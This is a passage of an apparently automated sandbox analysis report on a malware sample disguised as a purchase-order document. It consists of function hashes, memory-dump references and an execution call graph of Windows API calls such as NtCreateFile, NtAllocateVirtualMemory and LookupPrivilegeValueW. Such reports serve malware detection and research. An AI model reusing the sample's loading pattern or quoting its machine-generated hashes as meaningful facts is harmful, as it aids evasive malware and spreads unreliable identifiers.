                                                                                            • Instruction Fuzzy Hash: 4311BE75504284DFDB42CF94C9C4B15BB61FB84324F28C6A9D8498B696C33AE45ACB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 017FD745 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462638418.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_17fd000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75cfcebe6298c0b6f3a3033d7eb707fffdf27eb15092e9e7237cc518626531a6
                                                                                            • Instruction ID: 2d56feff847708dbcd77f9de808a82c96df63e032a90f99565daaee8e250e68e
                                                                                            • Opcode Fuzzy Hash: 75cfcebe6298c0b6f3a3033d7eb707fffdf27eb15092e9e7237cc518626531a6
                                                                                            • Instruction Fuzzy Hash: 0601F7714083C09AE7314AAACC84BA7FB9CEF41364F08895EEE041E346D37A9444CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 017FD744 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462638418.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_17fd000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7a6886c39ab2854ed0d1399b365bd45a7e8f4f931feb6bb7770f21115f4aaf3
                                                                                            • Instruction ID: f3e09dcbd5882d1214f5ba292c46a98f86975ce2b434636a7f20b1bf3bb7d625
                                                                                            • Opcode Fuzzy Hash: d7a6886c39ab2854ed0d1399b365bd45a7e8f4f931feb6bb7770f21115f4aaf3
                                                                                            • Instruction Fuzzy Hash: 6FF04F714042849AE7218E59CC84B63FB98EB51774F18C45AEE485E396D279A844CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00EB5756 Relevance: 2.3, Strings: 1, Instructions: 1098COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.460412452.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.460401848.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.460515333.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eb0000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-1037565863
                                                                                            • Opcode ID: fdaf59512bf7f2f99f08530028b07156111ddb7262c01e008014ea35cc486a1d
                                                                                            • Instruction ID: 368d91ee3ef1056fcbc8f21fe74dc70a2d618db072898d4b1b42585efe64950a
                                                                                            • Opcode Fuzzy Hash: fdaf59512bf7f2f99f08530028b07156111ddb7262c01e008014ea35cc486a1d
                                                                                            • Instruction Fuzzy Hash: DDA2FD6144E7D19FC7138B708CB5692BFB1AE1321471E89EBC4C1CF4A3E25D589AC762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00EB5CC6 Relevance: 1.8, Strings: 1, Instructions: 557COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.460412452.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.460401848.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.460515333.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eb0000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-1037565863
                                                                                            • Opcode ID: b757bca7cece314274782f7182b6b293406b3d19ca747dd04bb574f507cc4f73
                                                                                            • Instruction ID: 035c1b698f6f06951ba2f2a0dd39f890c1867bbb539464daf23a18edc0381444
                                                                                            • Opcode Fuzzy Hash: b757bca7cece314274782f7182b6b293406b3d19ca747dd04bb574f507cc4f73
                                                                                            • Instruction Fuzzy Hash: 0F32A66244E7D16FD7138B704CB46827FB06E1321471E89EBC4C5CF4A3E21D586AC7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0308E718 Relevance: .3, Instructions: 315COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1cfe107d245c1c917b24e9ba23706c2df4fe935b9f6d9805ddb66c74096be88
                                                                                            • Instruction ID: 5a2bc7338bb6acc80802031c6dce65c4351ffa575b39936961e5e48ba5637684
                                                                                            • Opcode Fuzzy Hash: c1cfe107d245c1c917b24e9ba23706c2df4fe935b9f6d9805ddb66c74096be88
                                                                                            • Instruction Fuzzy Hash: 3E12CAF142174A8BD314CFA6EC9A1A93FA0B765328B906309E1635FBD1DFB4614ACF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0308C2D4 Relevance: .3, Instructions: 265COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 27dabcd0a7fa2791d433c137cde3e9be2b60216d9a011850ee5aa3a85803eded
                                                                                            • Instruction ID: deb4c0bd95100dfc86847b75b1776aa7460c86914a582043469522357694c552
                                                                                            • Opcode Fuzzy Hash: 27dabcd0a7fa2791d433c137cde3e9be2b60216d9a011850ee5aa3a85803eded
                                                                                            • Instruction Fuzzy Hash: 34A16E36E117198FCF05EFB5D8845DDBBF6FF88300B15856AE845AB260EB31A906CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0308E709 Relevance: .2, Instructions: 221COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec92cab42305f759f9c5d49b475745ade3024798c80d09a1c468c62a9652ccf3
                                                                                            • Instruction ID: c477ddbc692e97bb2b4bf51618bb37f50091df9147d3e39edd55f19eaf7e0130
                                                                                            • Opcode Fuzzy Hash: ec92cab42305f759f9c5d49b475745ade3024798c80d09a1c468c62a9652ccf3
                                                                                            • Instruction Fuzzy Hash: CBC12CB14217498AD710DFA6EC9A1A93FB1BBA5328B506309E1636B7D0DFB4704ACF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:3%
                                                                                            Total number of Nodes:737
                                                                                            Total number of Limit Nodes:89
                                                                                            execution_graph 15035 41d9d0 15038 41a170 15035->15038 15039 41a196 15038->15039 15050 408f90 15039->15050 15041 41a1a2 15049 41a1e9 15041->15049 15058 40d5a0 15041->15058 15043 41a1b7 15044 41a1cc 15043->15044 15106 418e00 15043->15106 15070 40aa40 15044->15070 15047 41a1db 15048 418e00 2 API calls 15047->15048 15048->15049 15051 408f9d 15050->15051 15109 408ee0 15050->15109 15053 408fa4 15051->15053 15121 408e80 15051->15121 15053->15041 15059 40d5cc 15058->15059 15633 40a440 15059->15633 15061 40d5de 15637 40d4b0 15061->15637 15064 40d611 15067 40d622 15064->15067 15069 418be0 2 API calls 15064->15069 15065 40d5f9 15066 40d604 15065->15066 15068 418be0 2 API calls 15065->15068 15066->15043 15067->15043 15068->15066 15069->15067 15071 40aa65 15070->15071 15072 40a440 LdrLoadDll 15071->15072 15073 40aabc 15072->15073 15653 40a0c0 15073->15653 15075 40aae2 15105 40ad33 15075->15105 15662 413820 15075->15662 15077 40ab27 15077->15105 15665 407dc0 15077->15665 15079 40ab6b 15079->15105 15672 418c50 15079->15672 15083 40abc1 15084 40abc8 15083->15084 15086 418760 LdrLoadDll 15083->15086 15085 41a680 2 API calls 15084->15085 15087 40abd5 15085->15087 15088 40ac05 15086->15088 15087->15047 15089 40ac12 15088->15089 15092 40ac22 15088->15092 15090 41a680 2 API calls 15089->15090 15091 40ac19 15090->15091 15091->15047 15093 40d630 LdrLoadDll 15092->15093 15094 40ac96 15093->15094 15094->15084 15095 40aca1 15094->15095 15096 41a680 2 API calls 15095->15096 15097 40acc5 15096->15097 15683 4187b0 15097->15683 15100 418760 LdrLoadDll 15101 40ad00 15100->15101 15101->15105 15686 418570 15101->15686 15104 418e00 2 API calls 15104->15105 15105->15047 15107 418e1f ExitProcess 15106->15107 15108 419700 LdrLoadDll 15106->15108 15108->15107 15140 417320 15109->15140 15113 408f06 15113->15051 15114 408efc 15114->15113 15147 419ab0 15114->15147 15116 408f43 15116->15113 15158 408d10 15116->15158 15118 408f63 15164 408760 15118->15164 15120 408f75 15120->15051 15122 408e9a 15121->15122 15123 419da0 LdrLoadDll 15121->15123 15615 419da0 15122->15615 15123->15122 15126 419da0 LdrLoadDll 15127 408ec1 15126->15127 15128 40d3a0 15127->15128 15129 40d3b9 15128->15129 15619 40a2c0 15129->15619 15131 40d3cc 15623 418930 15131->15623 15135 40d3f2 15138 40d41d 15135->15138 15629 4189b0 15135->15629 15137 418be0 2 API calls 15139 408fb5 15137->15139 15138->15137 15139->15041 15141 41732f 15140->15141 15168 4142d0 15141->15168 15143 408ef3 15144 4171d0 15143->15144 15201 418d50 15144->15201 15148 419ac9 15147->15148 15208 413ed0 15148->15208 15150 419ae1 15151 419aea 15150->15151 15247 4198f0 15150->15247 15151->15116 15153 419afe 15153->15151 15264 418650 15153->15264 15161 408d2a 15158->15161 15589 4071c0 15158->15589 15160 408d31 15160->15118 15161->15160 15602 407480 15161->15602 15165 408788 15164->15165 15608 40a190 15165->15608 15167 4087be 15167->15120 15172 4142db 15168->15172 15169 4142ea 15169->15143 15172->15169 15173 414750 15172->15173 15178 414450 15173->15178 15175 414768 15176 4142d0 LdrLoadDll 15175->15176 15177 41443c 15175->15177 15176->15177 15177->15143 15179 414475 15178->15179 15180 4144e4 15179->15180 15192 409f70 15179->15192 15180->15175 15182 414516 15187 4145bb 15182->15187 15197 41a920 15182->15197 15185 4145b4 15185->15187 15190 414750 LdrLoadDll 15185->15190 15186 414621 15186->15187 15188 414750 LdrLoadDll 15186->15188 15187->15175 15189 414653 15188->15189 15189->15175 15191 414617 15190->15191 15191->15175 15194 409f94 15192->15194 15193 409f9b 15193->15182 15194->15193 15195 409fd0 LdrLoadDll 15194->15195 15196 409fe7 15194->15196 15195->15196 15196->15182 15198 41a930 15197->15198 15199 41455d 15197->15199 15200 4142d0 LdrLoadDll 15198->15200 15199->15185 15199->15186 15199->15187 15200->15199 15204 419700 15201->15204 15203 4171e5 15203->15114 15205 419785 15204->15205 15206 41970f 15204->15206 15205->15203 15206->15205 15207 4142d0 LdrLoadDll 15206->15207 15207->15205 15209 414205 15208->15209 15210 413ee4 15208->15210 15209->15150 15210->15209 15270 4183a0 15210->15270 15213 414010 15273 418ab0 15213->15273 15214 413ff3 15331 418bb0 15214->15331 15217 414037 15219 41a680 2 API calls 15217->15219 15218 413ffd 15218->15150 15221 414043 15219->15221 15220 4141c9 15223 418be0 2 API calls 15220->15223 15221->15218 15221->15220 15222 4141df 15221->15222 15228 4140d2 15221->15228 15356 413c10 15222->15356 15225 4141d0 15223->15225 15225->15150 15226 4141f2 15226->15150 15227 414139 15227->15220 15229 41414c 15227->15229 15228->15227 15230 4140e1 15228->15230 15347 418a30 15229->15347 15232 4140e6 15230->15232 15233 4140fa 15230->15233 15334 413ad0 15232->15334 15236 414117 15233->15236 15237 4140ff 15233->15237 15236->15225 15289 413890 15236->15289 15277 413b70 15237->15277 15239 4140f0 15239->15150 15243 41410d 15243->15150 15244 41412f 15244->15150 15246 4141b8 15246->15150 15248 41990b 15247->15248 15249 41991d 15248->15249 15419 41a600 15248->15419 15249->15153 15251 41993d 15422 4134f0 15251->15422 15253 419960 15253->15249 15254 4134f0 3 API calls 15253->15254 15256 419982 15254->15256 15256->15249 15454 414810 15256->15454 15257 419a0a 15258 419a1a 15257->15258 15547 419680 15257->15547 15465 4194f0 15258->15465 15261 419a48 15544 418610 15261->15544 15265 419700 LdrLoadDll 15264->15265 15266 41866c 15264->15266 15265->15266 15267 41a680 15266->15267 15268 419b59 15267->15268 15586 418dc0 15267->15586 15268->15116 15271 419700 LdrLoadDll 15270->15271 15272 413fc4 15271->15272 15272->15213 15272->15214 15272->15218 15274 418ac6 15273->15274 15275 419700 LdrLoadDll 15274->15275 15276 418acc NtCreateFile 15275->15276 15276->15217 15278 413b8c 15277->15278 15279 418a30 LdrLoadDll 15278->15279 15280 413bad 15279->15280 15281 413bb4 15280->15281 15282 413bc8 15280->15282 15283 418be0 2 API calls 15281->15283 15284 418be0 2 API calls 15282->15284 15285 413bbd 15283->15285 15286 413bd1 15284->15286 15285->15243 15390 41a890 15286->15390 15288 413bdc 15288->15243 15290 4138db 15289->15290 15293 41390e 15289->15293 15294 418a30 LdrLoadDll 15290->15294 15291 413a59 15292 418a30 LdrLoadDll 15291->15292 15301 413a74 15292->15301 15293->15291 15295 41392a 15293->15295 15296 4138f6 15294->15296 15297 418a30 LdrLoadDll 15295->15297 15298 418be0 2 API calls 15296->15298 15299 413945 15297->15299 15300 4138ff 15298->15300 15303 413961 15299->15303 15304 41394c 15299->15304 15300->15244 15302 418a70 LdrLoadDll 15301->15302 15307 413aae 15302->15307 15305 413966 15303->15305 15306 41397c 15303->15306 15308 418be0 2 API calls 15304->15308 15309 418be0 2 API calls 15305->15309 15316 413981 15306->15316 15396 41a850 15306->15396 15310 418be0 2 API calls 15307->15310 15311 413955 15308->15311 15312 41396f 15309->15312 15313 413ab9 15310->15313 15311->15244 15312->15244 15313->15244 15324 413993 15316->15324 15399 418b60 15316->15399 15317 4139e7 15318 4139fe 15317->15318 15407 4189f0 15317->15407 15320 413a05 15318->15320 15321 413a1a 15318->15321 15322 418be0 2 API calls 15320->15322 15323 418be0 2 API calls 15321->15323 15322->15324 15325 413a23 15323->15325 15324->15244 15326 413a4f 15325->15326 15402 41a450 15325->15402 15326->15244 15328 413a3a 15329 41a680 2 API calls 15328->15329 15330 413a43 15329->15330 15330->15244 15332 419700 LdrLoadDll 15331->15332 15333 418bcc 15332->15333 15333->15218 15335 413b0d 15334->15335 15410 418710 15334->15410 15337 413b14 15335->15337 15338 413b28 15335->15338 15339 418be0 2 API calls 15337->15339 15413 418760 15338->15413 15341 413b1d 15339->15341 15341->15239 15343 418be0 2 API calls 15344 413b52 15343->15344 15345 418be0 2 API calls 15344->15345 15346 413b5c 15345->15346 15346->15239 15348 414194 15347->15348 15349 419700 LdrLoadDll 15347->15349 15350 418a70 15348->15350 15349->15348 15351 4141ac 15350->15351 15352 419700 LdrLoadDll 15350->15352 15353 418be0 15351->15353 15352->15351 15354 418bfc NtClose 15353->15354 15355 419700 LdrLoadDll 15353->15355 15354->15246 15355->15354 15357 413c4e 15356->15357 15358 418a30 LdrLoadDll 15356->15358 15359 413c57 15357->15359 15360 413c6c 15357->15360 15358->15357 15361 418be0 2 API calls 15359->15361 15362 413c90 15360->15362 15363 413cda 15360->15363 15372 413c60 15361->15372 15416 418b10 15362->15416 15365 413d20 15363->15365 15366 413cdf 15363->15366 15368 413d32 15365->15368 15377 413e5a 15365->15377 15370 418b60 2 API calls 15366->15370 15366->15372 15371 413d37 15368->15371 15382 413d72 15368->15382 15369 418be0 2 API calls 15369->15372 15373 413d0a 15370->15373 15374 418b10 LdrLoadDll 15371->15374 15372->15226 15375 418be0 2 API calls 15373->15375 15378 413d5a 15374->15378 15376 413d13 15375->15376 15376->15226 15377->15372 15379 418b60 2 API calls 15377->15379 15380 418be0 2 API calls 15378->15380 15381 413eb1 15379->15381 15383 413d63 15380->15383 15385 418be0 2 API calls 15381->15385 15382->15372 15384 418b10 LdrLoadDll 15382->15384 15383->15226 15386 413d9a 15384->15386 15387 413eba 15385->15387 15388 418be0 2 API calls 15386->15388 15387->15226 15389 413da5 15388->15389 15389->15226 15393 418d80 15390->15393 15392 41a8aa 15392->15288 15394 419700 LdrLoadDll 15393->15394 15395 418d9c RtlAllocateHeap 15394->15395 15395->15392 15397 418d80 2 API calls 15396->15397 15398 41a868 15396->15398 15397->15398 15398->15316 15400 418b7c NtReadFile 15399->15400 15401 419700 LdrLoadDll 15399->15401 15400->15317 15401->15400 15403 41a474 15402->15403 15404 41a45d 15402->15404 15403->15328 15404->15403 15405 41a850 2 API calls 15404->15405 15406 41a48b 15405->15406 15406->15328 15408 419700 LdrLoadDll 15407->15408 15409 418a0c 15408->15409 15409->15318 15411 41872c 15410->15411 15412 419700 LdrLoadDll 15410->15412 15411->15335 15412->15411 15414 413b49 15413->15414 15415 419700 LdrLoadDll 15413->15415 15414->15343 15415->15414 15417 413cb5 15416->15417 15418 419700 LdrLoadDll 15416->15418 15417->15369 15418->15417 15420 41a62d 15419->15420 15552 418c90 15419->15552 15420->15251 15423 413501 15422->15423 15424 413509 15422->15424 15423->15253 15453 4137dc 15424->15453 15555 41b830 15424->15555 15426 41355d 15427 41b830 2 API calls 15426->15427 15430 413568 15427->15430 15428 4135b6 15431 41b830 2 API calls 15428->15431 15430->15428 15432 41b960 3 API calls 15430->15432 15566 41b8d0 15430->15566 15434 4135ca 15431->15434 15432->15430 15433 413627 15435 41b830 2 API calls 15433->15435 15434->15433 15560 41b960 15434->15560 15437 41363d 15435->15437 15438 41367a 15437->15438 15441 41b960 3 API calls 15437->15441 15439 41b830 2 API calls 15438->15439 15440 413685 15439->15440 15442 4136bf 15440->15442 15443 41b960 3 API calls 15440->15443 15441->15437 15572 41b890 15442->15572 15443->15440 15446 41b890 2 API calls 15447 4137be 15446->15447 15448 41b890 2 API calls 15447->15448 15449 4137c8 15448->15449 15450 41b890 2 API calls 15449->15450 15451 4137d2 15450->15451 15452 41b890 2 API calls 15451->15452 15452->15453 15453->15253 15455 414821 15454->15455 15456 413ed0 6 API calls 15455->15456 15461 414837 15456->15461 15457 414840 15457->15257 15458 414877 15459 41a680 2 API calls 15458->15459 15460 414888 15459->15460 15460->15257 15461->15457 15461->15458 15462 4148c3 15461->15462 15463 41a680 2 API calls 15462->15463 15464 4148c8 15463->15464 15464->15257 15575 419380 15465->15575 15467 419504 15468 419380 LdrLoadDll 15467->15468 15469 41950d 15468->15469 15470 419380 LdrLoadDll 15469->15470 15471 419516 15470->15471 15472 419380 LdrLoadDll 15471->15472 15473 41951f 15472->15473 15474 419380 LdrLoadDll 15473->15474 15475 419528 15474->15475 15476 419380 LdrLoadDll 15475->15476 15477 419531 15476->15477 15478 419380 LdrLoadDll 15477->15478 15479 41953d 15478->15479 15480 419380 LdrLoadDll 15479->15480 15481 419546 15480->15481 15482 419380 LdrLoadDll 15481->15482 15483 41954f 15482->15483 15484 419380 LdrLoadDll 15483->15484 15485 419558 15484->15485 15486 419380 LdrLoadDll 15485->15486 15487 419561 15486->15487 15488 419380 LdrLoadDll 15487->15488 15489 41956a 15488->15489 15490 419380 LdrLoadDll 15489->15490 15491 419576 15490->15491 15492 419380 LdrLoadDll 15491->15492 15493 41957f 15492->15493 15494 419380 LdrLoadDll 15493->15494 15495 419588 15494->15495 15496 419380 LdrLoadDll 15495->15496 15497 419591 15496->15497 15498 419380 LdrLoadDll 15497->15498 15499 41959a 15498->15499 15500 419380 LdrLoadDll 15499->15500 15501 4195a3 15500->15501 15502 419380 LdrLoadDll 15501->15502 15503 4195af 15502->15503 15504 419380 LdrLoadDll 15503->15504 15505 4195b8 15504->15505 15506 419380 LdrLoadDll 15505->15506 15507 4195c1 15506->15507 15508 419380 LdrLoadDll 15507->15508 15509 4195ca 15508->15509 15510 419380 LdrLoadDll 15509->15510 15511 4195d3 15510->15511 15512 419380 LdrLoadDll 15511->15512 15513 4195dc 15512->15513 15514 419380 LdrLoadDll 15513->15514 15515 4195e8 15514->15515 15516 419380 LdrLoadDll 15515->15516 15517 4195f1 15516->15517 15518 419380 LdrLoadDll 15517->15518 15519 4195fa 15518->15519 15520 419380 LdrLoadDll 15519->15520 15521 419603 15520->15521 15522 419380 LdrLoadDll 15521->15522 15523 41960c 15522->15523 15524 419380 LdrLoadDll 15523->15524 15525 419615 15524->15525 15526 419380 LdrLoadDll 15525->15526 15527 419621 15526->15527 15528 419380 LdrLoadDll 15527->15528 15529 41962a 15528->15529 15530 419380 LdrLoadDll 15529->15530 15531 419633 15530->15531 15532 419380 LdrLoadDll 15531->15532 15533 41963c 15532->15533 15534 419380 LdrLoadDll 15533->15534 15535 419645 15534->15535 15536 419380 LdrLoadDll 15535->15536 15537 41964e 15536->15537 15538 419380 LdrLoadDll 15537->15538 15539 41965a 15538->15539 15540 419380 LdrLoadDll 15539->15540 15541 419663 15540->15541 15542 419380 LdrLoadDll 15541->15542 15543 41966c 15542->15543 15543->15261 15545 419700 LdrLoadDll 15544->15545 15546 41862c 15545->15546 15546->15153 15549 419692 15547->15549 15548 4196a1 15548->15258 15549->15548 15581 418c10 15549->15581 15551 4196ce 15551->15258 15553 418cac NtAllocateVirtualMemory 15552->15553 15554 419700 LdrLoadDll 15552->15554 15553->15420 15554->15553 15556 41b840 15555->15556 15557 41b846 15555->15557 15556->15426 15558 41a850 2 API calls 15557->15558 15559 41b86c 15558->15559 15559->15426 15561 41b8d0 15560->15561 15562 41b92d 15561->15562 15563 41a850 2 API calls 15561->15563 15562->15434 15564 41b90a 15563->15564 15565 41a680 2 API calls 15564->15565 15565->15562 15567 41b8f5 15566->15567 15569 41b92d 15566->15569 15568 41a850 2 API calls 15567->15568 15570 41b90a 15568->15570 15569->15430 15571 41a680 2 API calls 15570->15571 15571->15569 15573 4137b4 15572->15573 15574 41a680 2 API calls 15572->15574 15573->15446 15574->15573 15576 41939b 15575->15576 15577 4142d0 LdrLoadDll 15576->15577 15578 4193bb 15577->15578 15579 4142d0 LdrLoadDll 15578->15579 15580 41946f 15578->15580 15579->15580 15580->15467 15580->15580 15582 418c2c 15581->15582 15583 419700 LdrLoadDll 15581->15583 15582->15551 15584 419700 LdrLoadDll 15582->15584 15583->15582 15585 418c6c 15584->15585 15585->15551 15587 419700 LdrLoadDll 15586->15587 15588 418ddc RtlFreeHeap 15587->15588 15588->15268 15590 4071d0 15589->15590 15591 4071cb 15589->15591 15592 41a600 2 API calls 15590->15592 15591->15161 15595 4071f5 15592->15595 15593 407258 15593->15161 15594 418610 LdrLoadDll 15594->15595 15595->15593 15595->15594 15596 40725e 15595->15596 15600 41a600 2 API calls 15595->15600 15605 418d10 15595->15605 15598 407284 15596->15598 15599 418d10 LdrLoadDll 15596->15599 15598->15161 15601 407275 15599->15601 15600->15595 15601->15161 15603 40749e 15602->15603 15604 418d10 LdrLoadDll 15602->15604 15603->15118 15604->15603 15606 419700 LdrLoadDll 15605->15606 15607 418d2c 15606->15607 15607->15595 15609 40a1b4 15608->15609 15612 4183e0 15609->15612 15611 40a1ee 15611->15167 15613 4183fc 15612->15613 15614 419700 LdrLoadDll 15612->15614 15613->15611 15614->15613 15616 419dc3 15615->15616 15617 409f70 LdrLoadDll 15616->15617 15618 408eab 15617->15618 15618->15126 15620 40a2e3 15619->15620 15621 4183e0 LdrLoadDll 15620->15621 15622 40a360 15620->15622 15621->15622 15622->15131 15624 419700 LdrLoadDll 15623->15624 15625 40d3db 15624->15625 15625->15139 15626 418f20 15625->15626 15627 418f3f LookupPrivilegeValueW 15626->15627 15628 419700 LdrLoadDll 15626->15628 15627->15135 15628->15627 15630 4189be 15629->15630 15631 419700 LdrLoadDll 15630->15631 15632 4189cc 15631->15632 15632->15138 15634 40a44b 15633->15634 15635 40a2c0 LdrLoadDll 15634->15635 15636 40a496 15635->15636 15636->15061 15638 40d4ca 15637->15638 15646 40d580 15637->15646 15639 40a2c0 LdrLoadDll 15638->15639 15640 40d4ec 15639->15640 15647 418690 15640->15647 15642 40d52e 15650 4186d0 15642->15650 15645 418be0 2 API calls 15645->15646 15646->15064 15646->15065 15648 419700 LdrLoadDll 15647->15648 15649 4186ac 15647->15649 15648->15649 15649->15642 15651 40d574 15650->15651 15652 419700 LdrLoadDll 15650->15652 15651->15645 15652->15651 15654 40a0cd 15653->15654 15655 40a0d1 15653->15655 15654->15075 15656 40a0ea 15655->15656 15657 40a11c 15655->15657 15689 418420 15656->15689 15658 418420 LdrLoadDll 15657->15658 15659 40a12d 15658->15659 15659->15075 15661 40a10c 15661->15075 15663 40d630 LdrLoadDll 15662->15663 15664 413846 15662->15664 15663->15664 15664->15077 15694 407cc0 15665->15694 15667 407dd9 15668 407dfd 15667->15668 15669 407cc0 8 API calls 15667->15669 15668->15079 15670 407dea 15669->15670 15670->15668 15704 40d8a0 15670->15704 15673 418c66 15672->15673 15674 419700 LdrLoadDll 15673->15674 15675 40aba2 15674->15675 15676 40d630 15675->15676 15677 40d64d 15676->15677 15678 418710 LdrLoadDll 15677->15678 15679 40d68e 15678->15679 15680 40d695 15679->15680 15681 418760 LdrLoadDll 15679->15681 15680->15083 15682 40d6be 15681->15682 15682->15083 15684 419700 LdrLoadDll 15683->15684 15685 40acd9 15684->15685 15685->15100 15687 419700 LdrLoadDll 15686->15687 15688 40ad2c 15687->15688 15688->15104 15690 419700 LdrLoadDll 15689->15690 15691 41843c 15690->15691 15691->15661 15692 419700 LdrLoadDll 15691->15692 15693 41847c 15692->15693 15693->15661 15695 407cd6 15694->15695 15696 407cde 15694->15696 15695->15667 15697 4071c0 2 API calls 15696->15697 15698 407ce8 15697->15698 15701 407d8a 15698->15701 15703 407d94 15698->15703 15712 407ac0 15698->15712 15745 406230 15698->15745 15702 407480 LdrLoadDll 15701->15702 15702->15703 15703->15667 15705 40d8c5 15704->15705 15706 4074c0 6 API calls 15705->15706 15710 40d8e9 15706->15710 15707 40d8f6 15707->15668 15708 413ed0 6 API calls 15708->15710 15710->15707 15710->15708 15711 41a680 2 API calls 15710->15711 15901 40d6e0 15710->15901 15711->15710 15713 407ae5 15712->15713 15755 418460 15713->15755 15716 407b39 15716->15698 15717 407bba 15790 40d780 15717->15790 15718 418650 LdrLoadDll 15719 407b5d 15718->15719 15719->15717 15721 407b68 15719->15721 15723 407be6 15721->15723 15758 40ad40 15721->15758 15722 407bd5 15724 407bf2 15722->15724 15725 407bdc 15722->15725 15723->15698 15798 4184e0 15724->15798 15727 418be0 2 API calls 15725->15727 15727->15723 15728 407b82 15728->15723 15778 4078f0 15728->15778 15733 40ad40 2 API calls 15734 407c3d 15733->15734 15734->15723 15801 418510 15734->15801 15739 418570 LdrLoadDll 15740 407c8b 15739->15740 15741 418be0 2 API calls 15740->15741 15742 407c95 15741->15742 15807 4076c0 15742->15807 15744 407ca9 15744->15698 15746 40627a 15745->15746 15747 418460 LdrLoadDll 15746->15747 15748 406294 15747->15748 15749 4142d0 LdrLoadDll 15748->15749 15754 40636c 15748->15754 15750 4062e8 15749->15750 15751 40a190 LdrLoadDll 15750->15751 15752 406347 15751->15752 15753 4142d0 LdrLoadDll 15752->15753 15753->15754 15754->15698 15756 407b2f 15755->15756 15757 419700 LdrLoadDll 15755->15757 15756->15716 15756->15717 15756->15718 15757->15756 15761 40ad6b 15758->15761 15759 40d630 LdrLoadDll 15760 40adca 15759->15760 15762 40ae13 15760->15762 15763 418760 LdrLoadDll 15760->15763 15761->15759 15762->15728 15764 40adf5 15763->15764 15765 40adfc 15764->15765 15768 40ae1f 15764->15768 15766 4187b0 LdrLoadDll 15765->15766 15767 40ae09 15766->15767 15769 418be0 2 API calls 15767->15769 15770 40ae89 15768->15770 15771 40ae69 15768->15771 15769->15762 15773 4187b0 LdrLoadDll 15770->15773 15772 418be0 2 API calls 15771->15772 15774 40ae76 15772->15774 15775 40ae9b 15773->15775 15774->15728 15776 418be0 2 API calls 15775->15776 15777 40aea5 15776->15777 15777->15728 15779 407906 15778->15779 15823 417fd0 15779->15823 15781 407a91 15781->15698 15782 40791f 15782->15781 15844 4074c0 15782->15844 15784 407a05 